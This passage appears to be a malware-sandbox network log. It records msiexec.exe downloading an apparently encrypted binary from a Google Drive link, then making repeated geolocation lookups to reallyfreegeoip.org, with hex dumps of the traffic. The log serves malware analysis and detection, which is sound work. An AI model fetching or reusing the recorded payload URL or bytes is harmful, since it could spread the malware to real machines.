                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                              Host: drive.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2025-01-10 22:11:20 UTC1920INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:20 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'nonce-q2MHRvIFfUjG6I7oMLy15A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.450003142.250.184.1934433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:21 UTC258OUTGET /download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-01-10 22:11:24 UTC4940INHTTP/1.1 200 OK
                                                                                                                              X-GUploader-UploadID: AFIdbgQtopGoqpGtH9n3_-KCzI6WYGbx0HTTk53jAf9mtkhSCcC_UlwCvbfBcGEDdC4lKB48FVlaPRI
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                              Content-Security-Policy: default-src 'none'
                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Content-Disposition: attachment; filename="yqdLcuOeHN50.bin"
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 277056
                                                                                                                              Last-Modified: Tue, 10 Dec 2024 08:14:41 GMT
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:24 GMT
                                                                                                                              Expires: Fri, 10 Jan 2025 22:11:24 GMT
                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                              X-Goog-Hash: crc32c=e3xsHQ==
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close
                                                                                                                              2025-01-10 22:11:24 UTC4940INData Raw: 44 f3 30 55 51 de 89 fc 65 95 7e 3a f8 f6 48 64 99 50 16 14 c2 ec 18 37 3d fb b2 03 36 4d f4 3a d4 b1 dc 2d 51 51 5c b2 72 d0 c0 07 69 15 54 4a f0 de 06 f7 8c 26 db 77 5d d3 c0 08 a0 b1 d3 bc 93 a7 30 92 b2 f8 d9 8c 22 e5 e3 13 6a 63 d1 d7 bd ae 07 1b 6a 78 c7 85 a1 f5 fe 4a 95 e5 d8 f6 9f 6d f0 c2 41 93 0f 3f 62 26 4a 8f 1e ba 42 3d 97 be e7 8f bb 68 0c f3 57 61 7a 31 a9 e7 25 37 5f 51 b0 42 2a 09 94 7f bf 38 9f cd 59 9d 9a 15 5e 4f 11 e5 88 c0 20 38 0e c4 50 89 f3 89 f7 74 0e c0 33 91 1f de c4 1d dd 35 f2 87 bc 95 a4 a6 f9 4c d2 dc f7 40 4c 46 07 35 41 1e ef 85 ec 2a 90 36 5a 6a eb 2c 5d f5 32 82 1f 95 29 c1 6f 69 5c 66 64 01 d1 a0 17 1c 87 ef 21 ee 45 76 94 4e e6 6b cd 16 fd 8a 89 15 fa 98 d2 ba bd 66 b2 df a4 03 84 99 51 07 7f 27 77 46 7e 40 2b 39 76
                                                                                                                              Data Ascii: D0UQe~:HdP7=6M:-QQ\riTJ&w]0"jcjxJmA?b&JB=hWaz1%7_QB*8Y^O 8Pt35L@LF5A*6Zj,]2)oi\fd!EvNkfQ'wF~@+9v
                                                                                                                              2025-01-10 22:11:24 UTC4817INData Raw: 30 bf 8e 21 1f 23 5a 37 d7 94 a4 1b 20 7e c0 47 eb f8 cf c9 4b cb af 43 d2 d7 dc 2c 4e 74 1b a3 51 75 9d 3a 76 15 60 0f d9 46 0f 11 25 97 fc bf 74 9a 2d 72 80 a7 5c da dc d2 e3 0f 0a 55 d4 92 45 4d 53 52 81 42 65 c3 a2 8c e6 2d 1b 84 66 14 cc 0b eb 1b 9d 43 c3 57 d1 9a df 65 93 53 0e d1 3c 45 98 97 be 7e 60 10 b8 ed 3f 4c 96 8f d4 42 90 ce 92 6a d3 bb 90 30 a4 13 0c dd fe 1c fc 03 41 fc c5 3c fe a5 e9 a8 21 32 a0 be 55 cd 32 d7 35 da fe 5e 28 b5 bc f1 17 74 85 f1 17 61 a1 c5 cf 3c 72 fe 73 0b 94 50 95 e6 b1 bb 31 c4 55 3d 64 c4 a5 e3 ac 5b ed 82 79 6e 91 5c 97 a1 0e 3c 76 78 9c 90 49 b4 ed a9 87 85 b6 16 cb 8b 9e f2 97 a7 ac cc d5 90 89 82 6e 7a e1 23 bd 8e ff 31 40 10 18 f6 76 d8 21 43 42 5f be 74 9f b8 65 75 71 b2 ca 52 f8 2e ed 9e 1e 62 3c 45 78 7e 97
                                                                                                                              Data Ascii: 0!#Z7 ~GKC,NtQu:v`F%t-r\UEMSRBe-fCWeS<E~`?LBj0A<!2U25^(ta<rsP1U=d[yn\<vxInz#1@v!CB_teuqR.b<Ex~
                                                                                                                              2025-01-10 22:11:24 UTC1324INData Raw: 1b 13 39 9a cc 77 53 1a 39 9e 37 01 41 0e 83 25 b3 6c 65 36 5b 3d b0 42 e8 f2 93 af 54 1e b6 27 d2 16 bc d1 d9 39 17 2e 54 3f bb 93 96 73 c9 61 bc 0e e8 21 6d d3 9b 06 8a 67 b2 b2 24 8a 99 bb 4b dc 1a f5 bf 7c e4 68 ee c0 df 67 f8 60 5f 69 27 53 a7 19 08 75 eb b4 f9 05 dc d7 18 33 1d 7f 09 ab 06 37 1f fd a0 98 b1 8b 1b 8c 26 ef f0 1b 84 94 af ed 05 ae 03 68 a9 78 c7 8f 8e 31 fe 4a 9f e5 c9 fe f0 a8 f0 c2 4b ed 32 3f 62 22 25 49 1e ba 48 3d 86 b6 95 70 ab 68 7c db e3 61 7a 3b 5b f2 34 37 21 66 51 4c 2a b7 f2 75 9e 80 94 81 85 b4 d3 f0 77 3c 31 94 df b9 35 93 60 a9 00 48 b7 f0 b1 af 7a e0 5b 56 1a b4 c3 80 f2 5c ec 05 dd c3 89 be 94 23 b2 1b fc 57 33 5b 33 35 31 bc ca 9e 92 00 c0 73 5e c8 82 31 2c d0 fb 07 ff 51 01 b4 6f 69 56 09 ac 01 31 aa 15 63 b0 ee 71
                                                                                                                              Data Ascii: 9wS97A%le6[=BT'9.T?sa!mg$K|hg`_i'Su37&hx1JK2?b"%IH=ph|az;[47!fQL*uw<15`Hz[V\#W3[351s^1,QoiV1cq
                                                                                                                              2025-01-10 22:11:24 UTC1390INData Raw: 8b a0 94 e9 75 fd 48 a3 83 f1 65 7c fa b3 08 ac 00 25 9e 1e 1f 8b c2 69 85 c5 d6 b3 d8 eb 49 7f fa 1c e9 45 87 9d 92 58 41 b2 a1 05 54 2b b3 7e 75 4b 33 e2 b8 ad 13 fc 9a 14 9b 41 36 7a bc 4a 1b 4f 16 02 65 f5 0a c2 58 8c f6 1a 13 33 ff 90 ab 8d 03 0f 97 18 8c 01 04 90 21 96 52 75 6f 48 37 1d be cb e5 bb 1b 54 1e c2 b7 f7 0e ca 50 b5 3b 67 fc 67 0e 44 ab 96 79 db 3d 98 07 9c 1b 68 ea 28 a6 a2 12 cc 9d 2e 99 bf df 52 a8 1a 85 a3 54 45 68 e2 ca c9 b1 8e 73 58 72 20 6a e9 27 08 75 ef b1 26 71 66 c4 18 45 10 a0 09 ab 08 37 97 fd a0 98 a0 da a7 cc 26 e5 e7 3b ab 9c d1 d1 05 70 17 3e 42 4c c7 85 eb e6 dd 4a bd 87 d8 f6 95 b3 f0 c2 41 93 71 08 62 26 4e fd 7d b8 42 4d 81 96 66 8f bb 62 1a 0d 56 72 5e 20 0d cb 79 2a dc 0e 0a 4c 2b 98 8b c0 47 8f 9e f1 36 99 d9 55
                                                                                                                              Data Ascii: uHe|%iIEXAT+~uK3A6zJOeX3!RuoH7TP;ggDy=h(.RTEhsXr j'u&qfE7&;p>BLJAqb&N}BMfbVr^ y*L+G6U
                                                                                                                              2025-01-10 22:11:24 UTC1390INData Raw: 36 9e 67 17 46 ee 4e 0b 67 d5 a1 5a e9 71 5f 45 e3 f1 92 7e 61 07 51 20 d9 01 00 82 03 0e 84 c2 13 27 9e ea 9b 6c ef 3a 98 58 39 fb 24 73 83 94 47 32 97 b8 71 7d 2c dc a9 d7 6e 23 90 d1 81 13 8c 3c 42 49 3f 1c 70 af 46 c7 5b 0a 70 44 97 69 b0 fa d4 95 32 92 39 90 c6 bd 73 08 0f bf 12 08 6d 08 81 28 a4 2b cd 36 5b 3d 6d 1c c5 f9 93 be 5c 08 a7 df d2 16 b2 a3 ba 2a 1f 20 7c 17 3a 97 be b2 df 9f b7 72 22 30 6b e0 58 15 82 19 f6 9d 24 8e e3 f2 7a de 1e f6 15 54 65 62 81 07 c9 99 f3 73 49 70 31 6c f8 d6 08 75 e1 a0 16 05 8e 18 18 35 64 bf 21 cf 0c 1f d8 fd 7e 82 94 d0 ed 8c 26 ef f0 19 95 b4 b3 d7 05 a4 d9 1b 6a 78 c7 fb d4 f5 fe 4e e7 86 da f6 ef 7b d8 43 41 93 05 29 9c 27 59 84 0f b1 7b f6 96 be e7 f1 90 68 0c f7 7f 8a 7a 31 23 f4 29 49 67 4e 0a 48 58 2a 8c
                                                                                                                              Data Ascii: 6gFNgZq_E~aQ 'l:X9$sG2q},n#<BI?pF[pDi29sm(+6[=m\* |:r"0kX$zTebsIp1lu5d!~&jxN{CA)'Y{hz1#)IgNHX*
                                                                                                                              2025-01-10 22:11:24 UTC1390INData Raw: af eb 17 42 31 c5 82 c0 5c 2e fd 94 66 5a 9e ec 2a 11 45 99 5a e3 07 a7 61 f9 f3 e7 47 e0 77 f3 02 ba ff 03 82 6a ff 26 c5 19 27 9e f2 9b 6c ef 3b 16 5a 39 81 21 5c 13 92 28 e9 81 46 7a 67 2c 8a 5e d6 6e 29 84 7f e8 13 8c 39 19 ad 3f 1c 70 ce f9 a9 6a 7a 67 cd e6 0a b2 fb 81 95 64 57 39 90 c8 83 89 09 1c b0 6c b8 41 04 9a 52 3e 51 07 46 73 6c 6d 1c e4 8c d8 af 54 1a e0 5f d2 16 b2 dd a5 3b 17 5a 6a 5d 3a 93 9c db cb 8b a9 35 54 30 6b e0 2c 87 8a 67 cd 91 24 82 ef 3c 6a de 6a ea 12 54 65 62 ee c2 b7 db f9 73 5c 06 63 6a 97 1c 7b c9 eb a0 0d 6c 5c d7 18 3f 6e 97 53 ab 0c 15 c3 70 e0 92 b1 f9 fc 9a 54 64 f6 13 e5 3e f4 c0 2d 1a 07 1b 60 da e2 9d 93 06 f1 4a e5 47 fd ef e1 55 f0 c2 45 31 2a 25 10 31 5a 8f 6e 18 67 26 e9 a2 e7 8f bf 07 e2 f3 57 6b d8 14 35 95
                                                                                                                              Data Ascii: B1\.fZ*EZaGwj&'l;Z9!\(Fzg,^n)9?pjzgdW9lAR>QFslmT_;Zj]:5T0k,g$<jjTebs\cj{l\?nSpTd>-`JGUE1*%1Zng&Wk5
                                                                                                                              2025-01-10 22:11:24 UTC1390INData Raw: a2 20 36 d2 7c be 73 62 de f0 99 17 86 3c d6 9f f1 40 41 47 94 18 4c 9e fd 34 11 01 99 5a e3 75 ec 7b 96 58 f1 6f 6b 77 f3 30 6f 01 00 88 6c c6 92 ea 6f 27 e0 cb 9b 4c eb 45 75 58 11 86 37 74 98 92 34 6e d7 b8 7b 6d 0e a5 08 e5 62 29 e0 87 fc 13 8c 3e 93 a5 28 62 3f bc 4e bd c8 2f 68 32 b4 18 b2 8a 8c c3 1a 13 3f 32 e9 b2 f3 4f 1c b6 07 a3 64 1e e2 5d a1 44 77 94 7e 2c 76 91 ae f2 93 ae 71 08 ba ea c2 16 c8 01 9f 2c 3f ea 42 17 30 31 b3 61 ad 68 a8 1d 9e 92 4e f3 70 b0 8a 67 c6 3f 01 90 ef 10 68 de 6a 27 81 21 65 68 e4 68 e1 ec f9 73 52 6b 3e 18 a8 0e 08 05 95 bf 07 03 e5 ff 51 35 6e b5 7b 86 1f 1f ae d5 e2 92 b1 fe c8 92 37 f1 cb 57 95 9c d7 d7 d8 2f 06 1b 6a 5d ef b1 e1 f5 f4 59 8a e5 f0 94 9f 6d fa 1c 41 93 0f 3f 62 58 7e 8f 1e be 30 5e 95 be 97 99 93
                                                                                                                              Data Ascii: 6|sb<@AGL4Zu{Xokw0olo'LEuX7t4n{mb)>(b?N/h2?2Od]Dw~,vq,?B01ahNpg?hj'!ehhsRk>Q5n{7W/j]YmA?bX~0^
                                                                                                                              2025-01-10 22:11:24 UTC1390INData Raw: 16 68 85 f1 07 ca de 9e c5 d1 89 3c d2 a8 a1 6f 7a ee 98 eb 78 87 36 c5 88 e0 80 f0 ff b1 30 72 9e ec 24 6d af 99 72 8b 75 fd 6a 24 e0 f7 6f 61 77 f3 08 d2 33 00 88 68 b4 e7 c0 19 57 f6 e9 1a 6c eb 43 63 a6 38 e2 32 65 97 ab e2 e1 97 b8 05 43 2b b3 7e a5 5f 2b 90 df ab 3b 0d 38 31 8a 29 e2 7b af 48 a8 6c 33 40 41 e5 0a b2 ee 5a 85 27 13 39 96 bf 6b 8d 09 16 9e c2 01 41 0e 90 53 71 44 07 3c 48 30 7c 1b 90 c8 93 af 50 6d 0b 15 d2 1c d7 67 ba 3b 1d 5e 53 10 55 56 96 79 d5 e1 80 1d ee 34 04 2c 58 04 80 67 dd 9a 56 75 8d c9 0a f6 ae 85 a9 5e 17 7d ff ca b9 b1 a2 73 58 72 4f ad 97 18 02 75 fa a7 1a 8e a1 d7 18 34 4b a9 7b 0a 1a 1f ae 5f 85 85 99 4c d9 8c 2c 47 c6 0b e7 6f de d7 75 0c 22 02 14 40 c7 85 e5 57 db 50 e7 ce db f6 ef cf d5 d9 3f b3 0f 3f 66 84 6f 93
                                                                                                                              Data Ascii: h<ozx60r$mruj$oaw3hWlCc82eC+~_+;81){Hl3@AZ'9kASqD<H0|Pmg;^SUVy4,XgVu^}sXrOu4K{_L,Gou"@WP??fo
                                                                                                                              2025-01-10 22:11:24 UTC1390INData Raw: 36 c7 c8 31 d1 2c 92 a1 97 7d 94 a0 eb 7f e1 d4 f1 1f 73 ac 2d ac 56 ad 6f 77 60 ba fe 65 2b 20 c5 f2 42 74 5b ec 94 12 29 c2 ec 2e 74 b8 bb 41 64 35 fd 60 f8 a6 e7 1d de 60 f3 78 0e 24 17 a0 d8 c6 84 c8 bb 02 f8 b3 68 63 eb 39 d7 7d 20 8f 0f 74 92 96 8a c6 8d ca 50 6f 2b c3 d8 ff 1b 29 90 a5 ae 30 9a 10 47 80 3f 16 7a 9c 4e b5 6a 0a 58 37 e5 0a b8 fa a4 fd 25 13 39 94 dd 89 ff d6 0b b6 73 7f 5e 04 90 24 9b 0d 07 36 51 26 4e 62 ae f2 93 ab 7c 20 c8 15 d4 16 66 b3 9f 13 23 5e 42 1d 29 b7 96 51 bd 9f bd 17 30 30 6b ea 58 7a bd 67 cc 99 56 e9 9f c9 0a c8 32 04 a9 54 6f 7e 10 cb da bc e8 56 74 24 3d e7 d7 18 08 74 ce b6 75 a2 f7 d7 68 97 4b a8 21 1f 0c 1f d4 5f 85 8a c3 0b d6 8c 56 47 c6 0a eb a4 d1 d7 01 0c 22 01 18 53 c4 85 91 57 db 51 eb c5 d8 f6 9b cf d5
                                                                                                                              Data Ascii: 61,}s-Vow`e+ Bt[).tAd5``x$hc9} tPo+)0G?zNjX7%9s^$6Q&Nb| f#^B)Q00kXzgV2To~Vt$=tuhK!_VG"SWQ
                                                                                                                              2025-01-10 22:11:24 UTC1390INData Raw: c1 6d 01 71 e1 61 eb f0 47 1e 36 6a 14 c2 44 54 a0 84 6b 27 97 dd 01 db c6 e6 00 1b 89 36 d8 76 ad 44 78 c2 8e f3 01 e9 fc c5 82 ea 5c 2e fd 85 66 78 9e ec 2a 56 60 99 5a e3 1a 31 60 f9 89 f1 7e 70 09 c9 08 ac 05 7e b3 6c c6 80 b1 a5 27 e0 cb f4 a1 eb 49 7f 58 28 e0 26 78 fd 5c 28 e3 9d b8 6a 60 44 7c 7a d7 64 29 4e bf 98 3b b8 38 31 8a 2c 0f 7a 94 2c b9 6a 00 ae 40 e5 0a b2 fa a4 fd 2f 13 39 94 be c8 8f 09 6c a0 2b 80 41 04 9a 36 4d 45 14 22 4a 23 54 e7 ef f2 93 b2 d9 5e c8 15 d3 33 ae d1 1b 2d 17 2e e0 32 2d bb 22 79 df 95 1f 38 f6 42 98 e5 58 74 28 42 d5 e3 1c 8a 9d cd d8 fb 00 f7 82 57 65 18 4c ef d2 e7 d9 73 58 7c 82 4f 8b 6a a5 63 eb d0 a5 2b 94 d7 18 3f 7d aa 77 9d 0c 1f da 8f 37 83 b1 88 cf a4 a7 e5 e3 19 83 62 d0 c4 13 bf 11 22 bc 78 c7 85 f7 dd
                                                                                                                              Data Ascii: mqaG6jDTk'6vDx\.fx*V`Z1`~p~l'IX(&x\(j`D|zd)N;81,z,j@/9l+A6ME"J#T^3-.2-"y8BXt(BWeLsX|Ojc+?}w7b"x


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.450005104.21.112.14433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-01-10 22:11:27 UTC855INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:27 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Age: 1861876
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              cf-cache-status: HIT
                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wnn1ZENncqiOn9fF9QcaFfvYOEuSUf6w1dqe2AMgPGR4tA%2BxQZgXOZ9SkSom40jSxN%2BtoOSz7mZUnoHoU50Fpzq3u%2B4kuGG6CL5tuOFa0Rn52YTkHQgDIjgshWMtMMTG9HDttINB"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 900000bfc84dc34f-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1460&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1922317&cwnd=181&unsent_bytes=0&cid=ef72f282a1072d06&ts=151&x=0"
                                                                                                                              2025-01-10 22:11:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.450006104.21.112.14433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              2025-01-10 22:11:28 UTC859INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:28 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Age: 1861877
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              cf-cache-status: HIT
                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RsCnSMon4zZs3pv7WjQDPMY2x4GkXUmi5TrCsMfoRf7s3iY1Hb%2BU4%2BPaajIUQQmtwfVBk4vLs3Ufz8EGmwwBdTdiZXE%2FHIDOS6%2BjHn%2BGCgz8ajiqfPyZXuZWXpa4EyYuI0P06KYZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 900000c4f8ca424b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1573&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1845764&cwnd=248&unsent_bytes=0&cid=9ae4d38291e1f610&ts=146&x=0"
                                                                                                                              2025-01-10 22:11:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.450008104.21.112.14433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:29 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-01-10 22:11:29 UTC859INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:29 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Age: 1861878
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              cf-cache-status: HIT
                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bguBoqx8IYTgZsTcfWGVHKZ01NRxfe2%2FFkEZ5G1CjMw9DC2gJhaGqqFh5ChM%2BIn%2FGBIN16GZudkk8hc340ojZ3nfVNL2wG6anDlTqI8lSMP8hw%2Fl59YJzp%2BqmlUOHH71nWcmr4GL"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 900000cd3d8c727b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2609&min_rtt=1988&rtt_var=1987&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=419781&cwnd=234&unsent_bytes=0&cid=bb38b666859d4e19&ts=183&x=0"
